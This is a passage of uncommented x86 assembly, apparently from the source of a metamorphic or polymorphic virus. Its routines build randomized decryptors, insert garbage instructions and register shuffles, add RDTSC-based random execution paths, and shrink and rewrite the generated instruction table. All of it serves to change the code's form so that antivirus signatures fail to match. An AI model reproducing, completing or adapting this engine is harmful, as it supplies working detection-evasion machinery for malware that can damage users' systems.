mov [ebp+InstructionTable], eax
mov eax, [ebp+SizeOfNewCode]
push eax
mov eax, [ebp+RoundedSizeOfNewCode]
push eax
mov eax, [ebp+SizeOfNewCodeP2]
push eax
call AssembleCode
mov eax, [ebp+SizeOfNewCode]
mov [ebp+SizeOfDecryptor], eax
mov eax, [ebp+NewAssembledCode]
mov [ebp+AssembledDecryptor], eax
pop eax
mov [ebp+SizeOfNewCodeP2], eax
pop eax
mov [ebp+RoundedSizeOfNewCode], eax
pop eax
mov [ebp+SizeOfNewCode], eax
pop eax
mov [ebp+TranslatedDeltaRegister], eax
pop eax
mov [ebp+NewAssembledCode], eax
ret
MakeDecryptor endp
Poly_SetFunctionName proc
call Poly_SelectThreeRegisters
mov edx, [ebp+Poly_FirstPartOfFunction]
mov [ebp+IndexValue], edx
mov edx, [ebp+Poly_SecondPartOfFunction]
mov [ebp+BufferValue], edx
mov edx, [ebp+Poly_ThirdPartOfFunction]
mov [ebp+CounterValue], edx
call Poly_SetValueToRegisters
call Poly_SetPART_ONEtoMemory_GetStartAddress
mov ebx, eax
call Poly_SetPART_TWOtoMemory_GetStartAddress
mov ecx, eax
call Poly_SetPART_THREEtoMemory_GetStartAddress
mov edx, eax
call Poly_RandomCall
call Poly_SelectThreeRegisters
mov ecx, [ebp+IndexRegister]
xor edx, edx
call Poly_DoMOVRegValue
mov ebx, [ebp+AdditionToBuffer]
add ebx, 0Ch
mov ecx, [ebp+IndexRegister]
call Poly_DoMOVMemReg
ret
Poly_SetFunctionName endp
Poly_InsertLabel proc
mov eax, [ebp+LabelTable]
mov ecx, [ebp+NumberOfLabels]
or ecx, ecx
jz @@InsertLabel
@@LoopFindLabel:
cmp [eax], edi
jz @@LabelInserted
add eax, 8
sub ecx, 1
or ecx, ecx
jnz @@LoopFindLabel
@@InsertLabel:
mov [eax], edi
mov [eax+4], edi
mov ecx, [ebp+NumberOfLabels]
add ecx, 1
mov [ebp+NumberOfLabels], ecx
@@LabelInserted:
ret
Poly_InsertLabel endp
Poly_ModifyCounter proc
call Random
and eax, 3
add eax, 4
mov edx, eax
mov ecx, [ebp+CounterRegister]
call Poly_DoADDRegValue
ret
Poly_ModifyCounter endp
Poly_MaskIndex proc
mov ecx, [ebp+IndexRegister]
mov esi, 1
jmp Poly_MaskRegister
Poly_MaskIndex endp
Poly_ModifyIndex proc
mov edx, [ebp+Poly_Addition]
mov ecx, [ebp+IndexRegister]
call Poly_DoADDRegValue
ret
Poly_ModifyIndex endp
Poly_MaskRegister proc
mov eax, 20h
mov [edi], eax
mov [edi+1], ecx
call Random
mov ebx, [ebp+SizeOfNewCodeP2]
mov ecx, ebx
not ebx
and eax, ebx
sub ecx, esi
or eax, ecx
neg esi
and eax, esi
mov [edi+7], eax
add edi, 10h
ret
Poly_MaskRegister endp
Poly_MaskCounter proc
mov ecx, [ebp+CounterRegister]
mov esi, 4
jmp Poly_MaskRegister
Poly_MaskCounter endp
Poly_SelectThreeRegisters proc
mov eax, 8
mov [ebp+IndexRegister], eax
mov [ebp+BufferRegister], eax
mov [ebp+CounterRegister], eax
call Poly_GetAGarbageRegister
mov [ebp+IndexRegister], eax
call Poly_GetAGarbageRegister
mov [ebp+BufferRegister], eax
call Poly_GetAGarbageRegister
mov [ebp+CounterRegister], eax
ret
Poly_SelectThreeRegisters endp
Poly_SetValueToRegisters proc
call Poly_SetIndexValue_GetStartAddress
mov ebx, eax
call Poly_SetBufferValue_GetStartAddress
mov ecx, eax
call Poly_SetCounterValue_GetStartAddress
mov edx, eax
call Poly_RandomCall
ret
Poly_SetValueToRegisters endp
Poly_SetIndexValue_GetStartAddress:
call Poly_RandomCall_GetAddress
Poly_SetIndexValue proc
mov ecx, [ebp+IndexRegister]
mov edx, [ebp+IndexValue]
call Poly_DoMOVRegValue
ret
Poly_SetIndexValue endp
Poly_SetBufferValue_GetStartAddress:
call Poly_RandomCall_GetAddress
Poly_SetBufferValue proc
mov ecx, [ebp+BufferRegister]
mov edx, [ebp+BufferValue]
call Poly_DoMOVRegValue
ret
Poly_SetBufferValue endp
Poly_SetCounterValue_GetStartAddress:
call Poly_RandomCall_GetAddress
Poly_SetCounterValue proc
mov ecx, [ebp+CounterRegister]
mov edx, [ebp+CounterValue]
call Poly_DoMOVRegValue
ret
Poly_SetCounterValue endp
Poly_RandomCall_GetAddress proc
pop eax
ret
Poly_RandomCall_GetAddress endp
Poly_SetPART_ONEtoMemory_GetStartAddress:
call Poly_RandomCall_GetAddress
Poly_SetPART_ONEtoMemory proc
mov ecx, [ebp+IndexRegister]
mov ebx, [ebp+AdditionToBuffer]
call Poly_DoMOVMemReg
ret
Poly_SetPART_ONEtoMemory endp
Poly_SetPART_TWOtoMemory_GetStartAddress:
call Poly_RandomCall_GetAddress
Poly_SetPART_TWOtoMemory proc
mov ecx, [ebp+BufferRegister]
mov ebx, [ebp+AdditionToBuffer]
add ebx, 4
call Poly_DoMOVMemReg
ret
Poly_SetPART_TWOtoMemory endp
Poly_SetPART_THREEtoMemory_GetStartAddress:
call Poly_RandomCall_GetAddress
Poly_SetPART_THREEtoMemory proc
mov ecx, [ebp+CounterRegister]
mov ebx, [ebp+AdditionToBuffer]
add ebx, 8
call Poly_DoMOVMemReg
ret
Poly_SetPART_THREEtoMemory endp
Poly_RandomCall proc
mov esi, 5
@@Again: call Xp_GarbleRegisters
sub esi, 1
or esi, esi
jnz @@Again
or ebx, ebx
jz @@DontPush1st
push ebx
@@DontPush1st:
or ecx, ecx
jz @@DontPush2nd
push ecx
@@DontPush2nd:
or edx, edx
jz @@DontPush3rd
push edx
@@DontPush3rd:
ret
Poly_RandomCall endp
Poly_DoADDRegValue proc
mov eax, 3
call Random
and eax, 1
jz @@Direct
mov eax, 40h
mov [edi], eax
call Poly_GetAGarbageRegister
mov [edi+1], eax
mov ebx, eax
mov [edi+7], edx
add edi, 10h
mov eax, 01h
mov [edi], eax
mov [edi+1], ebx
mov [edi+7], ecx
add edi, 10h
ret
@@Direct:
xor eax, eax
mov [edi], eax
mov [edi+1], ecx
mov [edi+7], edx
add edi, 10h
ret
Poly_DoADDRegValue endp
Poly_DoMOVRegValue proc
mov eax, 2
call Random
and eax, 1
jz @@Direct
call Poly_GetAGarbageRegister
push ecx
mov ecx, eax
call @@Direct
mov eax, 41h
mov [edi], eax
mov [edi+1], ecx
pop ecx
mov [edi+7], ecx
add edi, 10h
ret
@@Direct: mov eax, 40h
mov [edi], eax
mov [edi+1], ecx
mov [edi+7], edx
add edi, 10h
ret
Poly_DoMOVRegValue endp
Poly_DoXORRegReg proc
mov eax, 3
call Random
and eax, 1
jz @@Single
call Poly_GetAGarbageRegister
mov esi, eax
mov eax, 41h
mov [edi], eax
mov [edi+1], edx
mov [edi+7], esi
add edi, 10h
mov edx, esi
@@Single: mov eax, 31h
mov [edi], eax
mov [edi+1], edx
mov [edi+7], ecx
add edi, 10h
ret
Poly_DoXORRegReg endp
Poly_DoPUSHValue proc
mov eax, 2
call Random
and eax, 3
or eax, eax
jz @@Direct
mov eax, 40h
mov [edi], eax
call Poly_GetAGarbageRegister
mov [edi+1], eax
mov [edi+7], edx
add edi, 10h
mov ecx, eax
call Poly_DoPUSHReg
ret
@@Direct: mov eax, 68h
mov [edi], eax
mov [edi+7], edx
add edi, 10h
ret
Poly_DoPUSHValue endp
Poly_DoPUSHReg proc
mov eax, 50h
mov [edi], eax
mov [edi+1], ecx
add edi, 10h
ret
Poly_DoPUSHReg endp
Poly_DoPOPReg proc
mov eax, 58h
mov [edi], eax
mov [edi+1], ecx
add edi, 10h
ret
Poly_DoPOPReg endp
Poly_DoMOVMemReg proc
xor eax, eax
call Random
and eax, 1
jz @@Direct
mov eax, 41h
mov [edi], eax
mov [edi+1], ecx
call Poly_GetAGarbageRegister
mov ecx, eax
mov [edi+7], eax
add edi, 10h
@@Direct: mov eax, 43h
mov [edi], eax
mov eax, 0808h
mov [edi+1], eax
mov eax, ebx
add eax, [ebp+Decryptor_DATA_SECTION]
mov [edi+3], eax
mov [edi+7], ecx
add edi, 10h
ret
Poly_DoMOVMemReg endp
Poly_DoMOVRegMem proc
mov eax, 1
call Random
and eax, 1
jz @@Direct
push ecx
call Poly_GetAGarbageRegister
mov ecx, eax
call @@Direct
mov eax, 41h
mov [edi], eax
mov [edi+1], ecx
pop ecx
mov [edi+7], ecx
add edi, 10h
ret
@@Direct: mov eax, 42h
mov [edi], eax
mov eax, 0808h
mov [edi+1], eax
mov eax, ebx
add eax, [ebp+Decryptor_DATA_SECTION]
mov [edi+3], eax
mov [edi+7], ecx
add edi, 10h
ret
Poly_DoMOVRegMem endp
Poly_MakeCheckWith0 proc
xor eax, eax
call Random
and eax, 1
jnz @@Single
mov eax, 40h
mov [edi], eax
call Poly_GetAGarbageRegister
mov [edi+1], eax
xor ebx, ebx
mov [edi+7], ebx
add edi, 10h
mov ebx, 39h
mov [edi], ebx
mov [edi+1], eax
mov [edi+7], ecx
add edi, 10h
ret
@@Single: mov eax, 38h
mov [edi], eax
mov [edi+1], ecx
xor eax, eax
mov [edi+7], eax
add edi, 10h
ret
Poly_MakeCheckWith0 endp
Poly_GetAGarbageRegister proc
@@Again: call Random
and eax, 7
cmp eax, [ebp+IndexRegister]
jz @@Again
cmp eax, [ebp+CounterRegister]
jz @@Again
cmp eax, [ebp+BufferRegister]
jz @@Again
cmp eax, 4
jz @@Again
ret
Poly_GetAGarbageRegister endp
Poly_GetGarbageOneByter proc
call Random
and eax, 7
add eax, 0F8h
cmp eax, 0FAh
jz @@ReturnCMC
cmp eax, 0FDh
jz @@ReturnNOP
cmp eax, 0FEh
jb @@Return
@@ReturnNOP:
mov eax, 90h
@@Return: ret
@@ReturnCMC:
mov eax, 0F5h
ret
Poly_GetGarbageOneByter endp
Poly_MakeRandomExecution proc
call Random
and eax, 3
jnz @@Normal
call Poly_SelectThreeRegisters
mov ecx, [ebp+IndexRegister]
mov edx, [ebp+Decryptor_DATA_SECTION]
call Random
and eax, 1Ch
add edx, eax
cmp eax, 1Ch
jz @@DontAddMore
call Random
and eax, 3
add edx, eax
@@DontAddMore:
call Poly_DoMOVRegValue
call Random
push eax
mov edx, eax
mov ecx, [ebp+BufferRegister]
call Poly_DoMOVRegValue
@@RDTSC_Option0:
mov eax, 3
call Random
and eax, 1
jz @@RDTSC_Option2
xor eax, eax
call Random
and eax, 1
jz @@RDTSC_Option3
@@RDTSC_Option1:
call Random
and eax, 0FF000000h
add eax, 000C3310Fh
jmp @@RDTSC_SetInstruction
@@RDTSC_Option2:
call Poly_GetGarbageOneByter
add eax, 0C3310F00h
jmp @@RDTSC_SetInstruction
@@RDTSC_Option3:
call Poly_GetGarbageOneByter
shl eax, 10h
add eax, 0C300310Fh
@@RDTSC_SetInstruction:
mov edx, eax
pop eax
sub edx, eax
mov ecx, [ebp+BufferRegister]
call Poly_DoADDRegValue
mov eax, 43h
mov [edi], eax
mov eax, 0800h
add eax, [ebp+IndexRegister]
mov [edi+1], eax
xor eax, eax
mov [edi+3], eax
mov eax, [ebp+BufferRegister]
mov [edi+7], eax
add edi, 10h
mov eax, 0ECh
mov [edi], eax
mov eax, [ebp+IndexRegister]
mov [edi+1], eax
add edi, 10h
xor eax, eax
mov [ebp+IndexRegister], eax
mov eax, 8
mov [ebp+BufferRegister], eax
mov [ebp+CounterRegister], eax
mov eax, 1
call Random
and eax, 1
jz @@DirectTEST
@@ANDandCheck:
mov eax, 20h
mov [edi], eax
xor eax, eax
call Xpand_ReverseTranslation
mov [edi+1], eax
call @@GetARandomPowerOf2
mov [edi+7], edx
add edi, 10h
xor eax, eax
call Xpand_ReverseTranslation
mov ecx, eax
call Poly_MakeCheckWith0
@@SetTheJump:
mov eax, 2
call Random
and eax, 1
add eax, 74h
mov [edi], eax
mov [ebp+Poly_JumpRandomExecution], edi
add edi, 10h
ret
@@DirectTEST:
mov eax, 48h
mov [edi], eax
xor eax, eax
call Xpand_ReverseTranslation
mov [edi+1], eax
call @@GetARandomPowerOf2
mov [edi+7], edx
add edi, 10h
jmp @@SetTheJump
@@Normal: xor eax, eax
mov [ebp+Poly_JumpRandomExecution], eax
ret
@@GetARandomPowerOf2:
call Random
and eax, 1Fh
mov edx, 1
@@LoopRotate:
or eax, eax
jz @@RotateFinish
shl edx, 1
sub eax, 1
jmp @@LoopRotate
@@RotateFinish:
ret
Poly_MakeRandomExecution endp
Poly_DoCALLMem proc
mov eax, 1
call Random
and eax, 1
jz @@Single
mov eax, 40h
mov [edi], eax
call Poly_GetAGarbageRegister
mov ebx, eax
mov [edi+1], eax
mov [edi+7], ecx
add edi, 10h
mov eax, 0EAh
mov [edi], eax
mov eax, 0800h
add eax, ebx
mov [edi+1], eax
xor eax, eax
mov [edi+3], eax
add edi, 10h
ret
@@Single: mov eax, 0EAh
mov [edi], eax
mov eax, 0808h
mov [edi+1], eax
mov [edi+3], ecx
add edi, 10h
ret
Poly_DoCALLMem endp
;---------------------------------------------------------------------------------------
ShrinkCode proc
mov edi, [ebp+InstructionTable]
mov eax, [edi]
and eax, 0FFh
call CheckIfInstructionUsesMem
or eax, eax
jz @@Shrink
call OrderRegs
@@Shrink: mov eax, [edi]
and eax, 0FFh
cmp eax, 0FFh
jz @@IncreaseEIP
call ShrinkThisInstructions
or eax, eax
jz @@IncreaseEIP
call DecreaseEIP
call DecreaseEIP
call DecreaseEIP
jmp @@Shrink
@@IncreaseEIP:
call IncreaseEIP
cmp edi, [ebp+AddressOfLastInstruction]
jnz @@Shrink
@@DecreaseAddressOfLastInstruction:
sub edi, 10h
mov eax, [edi]
and eax, 0FFh
cmp eax, 0FFh
jnz @@LastInstructionOK
mov [ebp+AddressOfLastInstruction], edi
jmp @@DecreaseAddressOfLastInstruction
@@LastInstructionOK:
mov edi, [ebp+InstructionTable]
@@FindAPICALL_X:
@@GetFirstInstruction:
call IncreaseEIP2
cmp eax, -1
jz @@EndOfScan
mov eax, [edi]
and eax, 0FFh
cmp eax, 50h
jnz @@ItsNot_SET_WEIGHT
push edi
mov esi, edi
call IncreaseEIP2
or eax, eax
jnz @@ItsNot_SET_WEIGHT_2
mov eax, [edi]
and eax, 0FFh
cmp eax, 40h
jnz @@ItsNot_SET_WEIGHT_2
mov edx, edi
call IncreaseEIP2
or eax, eax
jnz @@ItsNot_SET_WEIGHT_2
mov eax, [edi]
and eax, 0FFh
cmp eax, 40h
jnz @@ItsNot_SET_WEIGHT_2
mov ecx, edi
call IncreaseEIP2
or eax, eax
jnz @@ItsNot_SET_WEIGHT_2
mov eax, [edi]
and eax, 0FFh
cmp eax, 43h
jnz @@ItsNot_SET_WEIGHT_2
mov ebx, edi
call IncreaseEIP2
or eax, eax
jnz @@ItsNot_SET_WEIGHT_2
mov eax, [edi]
and eax, 0FFh
cmp eax, 58h
jnz @@ItsNot_SET_WEIGHT_2
mov eax, [esi+1]
and eax, 0FFh
mov esi, eax
mov eax, [edx+1]
and eax, 0FFh
cmp eax, esi
jnz @@ItsNot_SET_WEIGHT_2
mov eax, [edi+1]
and eax, 0FFh
cmp eax, esi
jnz @@ItsNot_SET_WEIGHT_2
mov esi, [ecx+1]
and esi, 0FFh
mov eax, [ebx+7]
and eax, 0FFh
cmp eax, esi
jnz @@ItsNot_SET_WEIGHT_2
pop esi
mov eax, 0F7h
mov [esi], al
mov eax, [esi+1]
mov [esi+9], al
mov eax, [ebx+1]
mov [esi+1], eax
mov eax, [ebx+3]
mov [esi+3], eax
mov eax, [edx+7]
mov [esi+7], al
mov eax, [ecx+1]
mov [esi+8], al
mov eax, 0FFh
mov [edx], eax
mov [ecx], eax
mov [ebx], eax
mov [edi], eax
jmp @@AllOK
@@ItsNot_SET_WEIGHT_2:
pop edi
@@ItsNot_SET_WEIGHT:
@@AllOK:
@@CheckAPICALL_X:
mov edx, edi
push edi
@@GetSecondInstruction:
call IncreaseEIP2
cmp eax, -1
jz @@EndOfScan
or eax, eax
jnz @@EndOfTriplet
mov esi, edi
@@GetThirdInstruction:
call IncreaseEIP2
cmp eax, -1
jz @@EndOfScan
or eax, eax
jnz @@EndOfTriplet
mov eax, [edx]
and eax, 0FFh
cmp eax, 50h
jnz @@FindAPICALL_END
mov eax, [esi]
and eax, 0FFh
cmp eax, 50h
jnz @@FindAPICALL_END
mov eax, [edi]
and eax, 0FFh
cmp eax, 50h
jnz @@FindAPICALL_END
mov eax, [edx+1]
and eax, 0FFh
or eax, eax
jnz @@FindAPICALL_END
mov eax, [esi+1]
and eax, 0FFh
cmp eax, 1
jnz @@FindAPICALL_END
mov eax, [edi+1]
and eax, 0FFh
cmp eax, 2
jnz @@FindAPICALL_END
mov eax, 0F4h
@@SetAPICALL_X:
mov [edx], eax
mov eax, 0FFh
mov [esi], eax
mov [edi], eax
jmp @@EndOfTriplet
@@FindAPICALL_END:
mov eax, [edx]
and eax, 0FFh
cmp eax, 58h
jnz @@EndOfTriplet
mov eax, [esi]
and eax, 0FFh
cmp eax, 58h
jnz @@EndOfTriplet
mov eax, [edi]
and eax, 0FFh
cmp eax, 58h
jnz @@EndOfTriplet
mov eax, [edx+1]
and eax, 0FFh
cmp eax, 2
jnz @@EndOfTriplet
mov eax, [esi+1]
and eax, 0FFh
cmp eax, 1
jnz @@EndOfTriplet
mov eax, [edi+1]
and eax, 0FFh
or eax, eax
jnz @@EndOfTriplet
mov eax, 0F5h
jmp @@SetAPICALL_X
@@EndOfTriplet:
pop edi
jmp @@FindAPICALL_X
@@EndOfScan:
pop edi
ret
ShrinkCode endp
DecreaseEIP proc
@@Again: cmp edi, [ebp+InstructionTable]
jz @@OK
mov eax, [edi+0Bh]
and eax, 0FFh
or eax, eax
jnz @@OK
sub edi, 10h
mov eax, [edi]
and eax, 0FFh
cmp eax, 0FFh
jz @@Again
@@OK: ret
DecreaseEIP endp
IncreaseEIP proc
mov ecx, [ebp+AddressOfLastInstruction]
cmp edi, ecx
jz @@_End
@@Again: add edi, 10h
cmp edi, ecx
jz @@_End
mov eax, [edi+0Bh]
and eax, 0FFh
or eax, eax
jnz @@End
mov eax, [edi]
and eax, 0FFh
cmp eax, 0FFh
jz @@Again
@@End: mov eax, [edi]
and eax, 0FFh
call CheckIfInstructionUsesMem
or eax, eax
jz @@_End
call OrderRegs
mov eax, [edi]
and eax, 0FFh
cmp eax, 4Fh
jnz @@_End
push edi
mov edi, [edi+7]
call OrderRegs
pop edi
@@_End: ret
IncreaseEIP endp
IncreaseEIP2 proc
cmp edi, [ebp+AddressOfLastInstruction]
jz @@EndOfScan
add edi, 10h
cmp edi, [ebp+AddressOfLastInstruction]
jz @@EndOfScan
mov eax, [edi]
and eax, 0FFh
cmp eax, 0FFh
jz IncreaseEIP2
mov eax, [edi+0Bh]
and eax, 0FFh
ret
@@EndOfScan:
mov eax, -1
ret
IncreaseEIP2 endp
ShrinkThisInstructions proc
push edi
@@Check_Single:
mov eax, [edi]
and eax, 0FFh
cmp eax, 30h
jnz @@Single_Next00
mov ecx, 0E0h
@@Single_Next_CommonXOR_s1:
mov eax, [edi+7]
@@Single_Next_CommonXOR_s1_2:
cmp eax, -1
jz @@Single_SetInstructionECX
@@Single_Next_CheckNulOP:
or eax, eax
jnz @@Single_End
jmp @@Single_SetNOP
@@Single_SetInstructionECX:
mov eax, ecx
jmp @@Single_SetInstruction
@@Single_Next00:
cmp eax, 34h
jnz @@Single_Next00_
mov ecx, 0E1h
jmp @@Single_Next_CommonXOR_s1
@@Single_Next00_:
cmp eax, 4Bh
jnz @@Single_Next00__
mov eax, 4Ah
jmp @@Single_SetInstruction
@@Single_Next00__:
cmp eax, 4Bh+80h
jnz @@Single_Next01
mov eax, 4Ah+80h
jmp @@Single_SetInstruction
@@Single_Next01:
cmp eax, 30h+80h
jnz @@Single_Next02
mov ecx, 0E2h
@@Single_Next01_GetSigned:
mov eax, [edi+7]
and eax, 0FFh
cmp eax, 80h
jb @@Single_Next01_NotSigned
add eax, 0FFFFFF00h
@@Single_Next01_NotSigned:
jmp @@Single_Next_CommonXOR_s1_2
@@Single_Next02:
cmp eax, 34h+80h
jnz @@Single_Next03
mov ecx, 0E3h
jmp @@Single_Next01_GetSigned
@@Single_Next03:
cmp eax, 41h
jnz @@Single_Next04
@@Single_Next_CommonMOV:
mov eax, [edi+1]
mov ecx, [edi+7]
and eax, 0FFh
and ecx, 0FFh
cmp eax, ecx
jnz @@Single_End
@@Single_SetNOP:
mov eax, 0FFh
@@Single_SetInstruction:
mov ecx, [edi]
and ecx, 0FFFFFF00h
and eax, 0FFh
add eax, ecx
mov [edi], eax
jmp @@EndCompressed
@@Single_Next04:
cmp eax, 41h+80h
jz @@Single_Next_CommonMOV
@@Single_Next05:
cmp eax, 28h
jnz @@Single_Next06
xor ecx, ecx
@@Single_Next_NegateImm:
mov eax, [edi+7]
neg eax
mov [edi+7], eax
jmp @@Single_SetInstructionECX
@@Single_Next06:
cmp eax, 28h+80h
jnz @@Single_Next07
mov ecx, 00h+80h
jmp @@Single_Next_NegateImm
@@Single_Next07:
cmp eax, 2Ch
jnz @@Single_Next08
mov ecx, 04h
jmp @@Single_Next_NegateImm
@@Single_Next08:
cmp eax, 2Ch+80h
jnz @@Single_Next09
mov ecx, 04h+80h
jmp @@Single_Next_NegateImm
@@Single_Next09:
or eax, eax
jnz @@Single_Next10
@@Single_Next_CheckNulOP_2:
mov eax, [edi+7]
jmp @@Single_Next_CheckNulOP
@@Single_Next10:
cmp eax, 4
jz @@Single_Next_CheckNulOP_2
cmp eax, 04h+80h
jz @@Single_Next_CheckNulOP_2_8b
cmp eax, 0Ch
jz @@Single_Next_CheckNulOP_2
cmp eax, 0Ch+80h
jz @@Single_Next_CheckNulOP_2_8b
cmp eax, 24h+80h
jz @@Single_Next10_Check_s1_8b
cmp eax, 24h
jnz @@Single_Next10_
@@Single_Next10_Check_s1:
mov eax, [edi+7]
cmp eax, -1
jz @@Single_SetNOP
or eax, eax
jnz @@Single_End
mov eax, 44h
jmp @@Single_SetInstruction
@@Single_Next10_Check_s1_8b:
mov eax, [edi+7]
and eax, 0FFh
cmp eax, 0FFh
jz @@Single_SetNOP
or eax, eax
jnz @@Single_End
mov eax, 44h+80h
jmp @@Single_SetInstruction
@@Single_Next10_:
cmp eax, 00h+80h
jnz @@Single_Next11
@@Single_Next_CheckNulOP_2_8b:
mov eax, [edi+7]
and eax, 0FFh
jmp @@Single_Next_CheckNulOP
@@Single_Next11:
cmp eax, 08h
jz @@Single_Next_CheckNulOP_2
@@Single_Next12:
cmp eax, 08h+80h
jz @@Single_Next_CheckNulOP_2_8b
@@Single_Next13:
cmp eax, 20h
jnz @@Single_Next14
mov eax, [edi+7]
cmp eax, -1
jz @@Single_SetNOP
or eax, eax
jnz @@Single_End
mov eax, 40h
jmp @@Single_SetInstruction
@@Single_Next14:
cmp eax, 20h+80h
jnz @@Single_Next15
mov eax, [edi+7]
and eax, 0FFh
cmp eax, 0FFh
jz @@Single_SetNOP
or eax, eax
jnz @@Single_End
mov eax, 40h+80h
jmp @@Single_SetInstruction
@@Single_Next15:
cmp eax, 31h
jnz @@Single_Next16
@@Single_Next_CheckSetTo0:
mov ecx, 40h
@@Single_Next_CheckSetTo0_2:
mov eax, [edi+1]
mov ebx, [edi+7]
and eax, 0FFh
and ebx, 0FFh
cmp eax, ebx
jnz @@Single_End
xor eax, eax
mov [edi+7], eax
jmp @@Single_SetInstructionECX
@@Single_Next16:
cmp eax, 31h+80h
jnz @@Single_Next17
@@Single_Next_CheckSetTo0_8b:
mov ecx, 40h+80h
jmp @@Single_Next_CheckSetTo0_2
@@Single_Next17:
cmp eax, 29h
jz @@Single_Next_CheckSetTo0
@@Single_Next18:
cmp eax, 29h+80h
jz @@Single_Next_CheckSetTo0_8b
@@Single_Next19:
cmp eax, 09h
jnz @@Single_Next20
@@Single_Next_CheckCheckIf0:
mov ecx, 38h
jmp @@Single_Next_CheckSetTo0_2
@@Single_Next20:
cmp eax, 09h+80h
jnz @@Single_Next21
@@Single_Next_CheckCheckIf0_8b:
mov ecx, 38h+80h
jmp @@Single_Next_CheckSetTo0_2
@@Single_Next21:
cmp eax, 21h
jz @@Single_Next_CheckCheckIf0
@@Single_Next22:
cmp eax, 21h+80h
jz @@Single_Next_CheckCheckIf0_8b
@@Single_Next23:
cmp eax, 49h
jz @@Single_Next_CheckCheckIf0
@@Single_Next24:
cmp eax, 49h+80h
jz @@Single_Next_CheckCheckIf0_8b
@@Single_Next25:
cmp eax, 0FCh
jnz @@Single_Next26
mov eax, [edi+2]
and eax, 0FFh
cmp eax, 40h
jae @@Single_Next26
mov eax, [edi+1]
and eax, 0FFh
cmp eax, 8
jz @@Single_Next_LEA_CheckMOV
mov ecx, [edi+7]
and ecx, 0FFh
cmp eax, ecx
jz @@Single_Next_LEA_CheckADD
mov eax, [edi+2]
and eax, 0FFh
cmp eax, 8
jz @@Single_Next_LEA_CheckMOVRegReg
cmp eax, ecx
jz @@Single_Next_LEA_CheckADDRegReg2
mov ecx, [edi+1]
and ecx, 0FFh
cmp eax, ecx
jnz @@Single_End
mov eax, 8
mov ecx, [edi+1]
and ecx, 0FFFFFF00h
add eax, ecx
mov [edi+1], eax
mov eax, [edi+2]
add eax, 40h
mov [edi+2], eax
jmp @@EndCompressed
@@Single_Next_LEA_CheckADDRegReg2:
mov eax, [edi+3]
or eax, eax
jz @@Single_Next_LEA_SetADDRegReg_2
jmp @@Single_End
@@Single_Next_LEA_CheckMOV:
mov eax, [edi+2]
and eax, 0FFh
cmp eax, 8
jz @@Single_Next_LEA_SetMOV
mov ecx, [edi+7]
and ecx, 0FFh
cmp eax, ecx
jz @@Single_Next_LEA_SetADD_2
mov eax, [edi+3]
or eax, eax
jnz @@Single_End
@@Single_Next_LEA_SetMOVRegReg_2:
mov eax, [edi+2]
mov ecx, [edi+1]
and ecx, 0FFFFFF00h
and eax, 0FFh
add eax, ecx
mov [edi+1], eax
mov eax, 41h
jmp @@Single_SetInstruction
@@Single_Next_LEA_SetADD_2:
mov ecx, [edi+1]
and ecx, 0FFFFFF00h
and eax, 0FFh
add eax, ecx
mov [edi+1], eax
mov eax, [edi+3]
mov [edi+7], eax
xor eax, eax
jmp @@Single_SetInstruction
@@Single_Next_LEA_SetMOV:
mov ecx, 40h
mov eax, [edi+7]
and eax, 0FFh
mov ebx, [edi+1]
and ebx, 0FFFFFF00h
add eax, ebx
mov [edi+1], eax
@@Single_Next_LEA_SetInstructionECX:
mov eax, [edi+3]
mov [edi+7], eax
jmp @@Single_SetInstructionECX
@@Single_Next_LEA_CheckADD:
mov eax, [edi+2]
and eax, 0FFh
cmp eax, 8
jz @@Single_Next_LEA_SetADD
mov eax, [edi+3]
or eax, eax
jnz @@Single_End
@@Single_Next_LEA_SetADDRegReg:
mov eax, [edi+2]
mov ebx, [edi+1]
and ebx, 0FFFFFF00h
and eax, 0FFh
add eax, ebx
mov [edi+1], eax
@@Single_Next_LEA_SetADDRegReg_2:
mov eax, 01h
jmp @@Single_SetInstruction
@@Single_Next_LEA_SetADD:
mov eax, [edi+3]
mov [edi+7], eax
xor eax, eax
jmp @@Single_SetInstruction
@@Single_Next_LEA_CheckMOVRegReg:
mov eax, [edi+3]
or eax, eax
jnz @@Single_End
@@Single_Next_LEA_SetMOVRegReg:
mov eax, 41h
jmp @@Single_SetInstruction
@@Single_Next26:
cmp eax, 4Fh
jnz @@Single_Next27
mov esi, [edi+7]
mov eax, [edi+1]
cmp eax, [esi+1]
jnz @@Single_End
mov eax, [edi+3]
cmp eax, [esi+3]
jz @@Single_SetNOP
@@Single_Next27:
cmp eax, 38h
jb @@Single_Next28
cmp eax, 3Ch
ja @@Single_Next28
@@Single_Next27_Common:
mov edx, edi
@@Single_Next27_GetNextInstr:
add edx, 10h
mov eax, [edx+0Bh]
and eax, 0FFh
or eax, eax
jnz @@Single_SetNOP
mov eax, [edx]
and eax, 0FFh
cmp eax, 0FFh
jz @@Single_Next27_GetNextInstr
cmp eax, 70h
jb @@Single_SetNOP
cmp eax, 7Fh
ja @@Single_SetNOP
jmp @@Single_End
@@Single_Next28:
cmp eax, 38h+80h
jb @@Single_Next29
cmp eax, 3Ch+80h
jbe @@Single_Next27_Common
@@Single_Next29:
cmp eax, 48h
jb @@Single_Next30
cmp eax, 4Ch
jbe @@Single_Next27_Common
@@Single_Next30:
cmp eax, 48h+80h
jb @@Single_Next31
cmp eax, 4Ch+80h
jbe @@Single_Next27_Common
@@Single_Next31:
@@Single_End:
mov eax, [edi]
and eax, 0FFh
cmp eax, 80h+00
jb @@Check_Double
cmp eax, 80h+4Ch
ja @@Check_Double
and eax, 7
or eax, eax
jz @@GetFrom_RegImm
cmp eax, 1
jz @@GetFrom_RegReg
cmp eax, 2
jz @@GetFrom_RegMem
cmp eax, 3
jnz @@Check_Double
@@GetFrom_MemReg:
@@GetFrom_RegMem:
@@GetFrom_RegReg:
mov eax, [edi+7]
and eax, 0FFh
jmp @@GetFrom_OK
@@GetFrom_RegImm:
mov eax, [edi+1]
and eax, 0FFh
@@GetFrom_OK:
mov [ebp+Register8Bits], eax
@@Check_Double:
mov esi, edi
call IncreaseEIP
cmp edi, [ebp+AddressOfLastInstruction]
jz @@EndNoCompressed
mov eax, [edi+0Bh]
and eax, 0FFh
or eax, eax
jnz @@EndNoCompressed
mov eax, [esi]
and eax, 0FFh
cmp eax, 68h
jnz @@Double_Next00
mov eax, [edi]
and eax, 0FFh
cmp eax, 58h
jz @@Double_Next_PutMOVRegImm
cmp eax, 59h
jnz @@EndNoCompressed
@@Double_Next_PutMOVMemImm:
mov eax, [edi+1]
mov [esi+1], eax
mov eax, [edi+3]
mov [esi+3], eax
mov eax, 44h
jmp @@Double_Next_SetInstruction
@@Double_Next_PutMOVRegImm:
mov eax, [edi+1]
mov [esi+1], eax
